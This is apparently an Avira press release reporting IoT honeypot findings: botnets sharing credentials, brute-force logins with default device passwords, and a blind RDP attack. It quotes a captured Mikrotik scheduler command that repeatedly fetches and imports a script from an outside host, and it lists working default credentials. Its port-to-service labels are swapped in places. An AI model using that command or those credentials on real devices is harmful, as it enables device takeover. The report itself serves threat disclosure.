Avira honeypot uncovers hacker coordination and stand-alone strategies for attacking your smart devices
Tettnang, Germany, October 22, 2019 - How can an attacker in Country A find and attack a device in Country B? The answer is multi-layered. Attackers frequently use an IP/Port scanning scripts to find open ports on a device, with each open port linked to a corresponding service that communicates over it.
Essentially, the attackers are launching an automated search for open doors and windows. The IP/Port scanner itself can be very basic and simple to write at the entry level – or more complex depending on the attacker’s skill or objectives.
It takes just minutes for an attacker to find a connected device with open ports. The Avira IoT honeypot, with profiles of smart TVs, routers and IP cameras, was attacked within five minutes of going live. In just 30 minutes, it had experienced a range of attacks directed at devices using the telnet, SSH, and any device running on Android.
Sharing is caring
These scanning scripts may appear to be from autonomous botnets, each individually probing for open ports or vulnerable services – but not always. Some attacking botnets are interconnected, with sharing codes and information behind the scene about potential infected hosts. This automated data exchange begins within minutes of a script spotting an open port – and is followed by other botnets starting their assault. Shown below is a sequence of related attacks:
Attack no. | Date | Port | IP | Duration | Username | Password | Description |
|---|---|---|---|---|---|---|---|
17357 | Wed, 18 Sep 2019 10:48:44 (UTC) | 22 (Telnet) |
| 3.827 sec | root | zlxx. | Gathers information. Does not do anything malicious. |
17372 | Wed, 18 Sep 2019 10:48:49 (UTC) | 22 (Telnet) |
| 87.575 sec | root | zlxx. | The real attack. Downloads a malware and infects the device |
On Wed, 18 Sep 2019 / 10:48:44 (UTC) someone from Italy (more accurately a script) successfully logged into the honeypot with the username/password combination of "root" and "zlxx." This information was immediately shared with others. Five seconds later, someone from Singapore logged in with the same credential and infected the device.
This data sharing and attack coordination shows that attackers have succeeded in a basic division of labor and establishing inter-bot communication. Their first attack phase is to discover vulnerable devices and find a way in. The second phase is the actual device infection and gaining persistence.
Blind Shooting - Brute attacks:
Sharing data is the exception at the moment. Sometimes an entire attack is conducted in one session. This is essentially a brute-force shotgun attack in the dark where all devices are targeted, exposed and vulnerable ones take the damage, and the rest survive. Below are three actual examples of brute-force attacks.
Episode one:
We observed an attack on Wed, 18 Sep 2019 11:32:59 (UTC) from Ireland:
Attack no. | Date | Port | IP | Duration | Username | Password | Description |
|---|---|---|---|---|---|---|---|
17501 | Wed, 18 Sep 2019 11:32:59 (UTC) | 23 (SSH) |
| 38.482 sec | Root | nosoup4u | Downloads a malware and infects the device. |
If we look at the prior and subsequent connections to the honeypot, we see that this attack came out of the blue. Someone just logged in, infected the system and left.
Attack no. | Date | Port | IP | Duration | Username | Password | Description |
|---|---|---|---|---|---|---|---|
7193 | Tue, 17 Sep 2019 15:47:29 (UTC) | 23 (SSH) |
| 38.117 sec | Root | nosoup4u | Downloads a malware and infects the device. |
The attacker appears to have randomly or sequentially selected its victims and attacked them without even changing the username/password combination. Analysis of the used credentials reveals that these are the default credentials for DreamPlug routers. While every router gets the attack, it only hurts DreamPlug routers.
Episode two:
Attackers are also mixing ports and services in the blind hope of finding a vulnerable target. The honeypot caught an incoming attack on port 5555, the default port for ADB. However, the attack itself did not comply with the ADB protocol. Researchers dumped the attacked vector to find out more:
|
Their detective work revealed that this was an attack targeting RDP (Remote Desktop Protocol) which usually originates from Russia. However, the attacking vector had nothing to do with ADB (Android Debug Bridge). The attackers simply saw an open port, sent a blind attack targeting RDP with the hope that it would find a RDP server on the other end.
Episode three:
Similar to episode two, the honeypot caught another attack on SSH – a service used almost everywhere, from huge mainframes, servers, enterprises, routers, IP cameras, and smartphones.
/system scheduler add name="U6" interval=10m on-event="/tool fetch url=http://1awesome.net/poll/ea06e989-5ff1-424d-9327-5d143acb597b mode=http dst-path=7wmp0b4s.rsc\\r\\n/import 7wmp0b4s.rsc" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write
That is a malicious Mikrotik script which only targets Mikrotik devices and has no effect on those from other manufacturers. Again, a shotgun type approach which can only work a fraction of the time.
Attackers are looking, sharing, and acting
Attackers find your device because they are always looking for open ports and vulnerable devices. Every minute, the Avira honeypot collects almost ten attacks - an average of 14,125 attacks each day on just one individual device. An open port is an invitation that will not be refused.
Sharing is increasingly going to be the name of the game. Attackers have learned how to share data about your devices and this will raise the risks for. Armed with info on open ports, attacks will happen – either a more subtle coordinated approach or a brute force attack. This attack strategy is indirectly supported by device manufacturers not implementing security into product design with blank and weak default passwords and poor device installation processes.
Block attackers at the doorway with Avira
The lack of smart device security is systemic. A substantial number of smart devices have not been built with security in mind. It’s also not possible for the average user to make many of the needed security changes.
This is why Avira has developed SafeThings™ -- comprehensive protection for all internet connected devices in the home. For more information on Avira insights into smart device security and on how Avira SafeThings helps ISPs and router manufacturers protect their customers, please contact us at #MWC19 Los Angeles - South Hall #2540.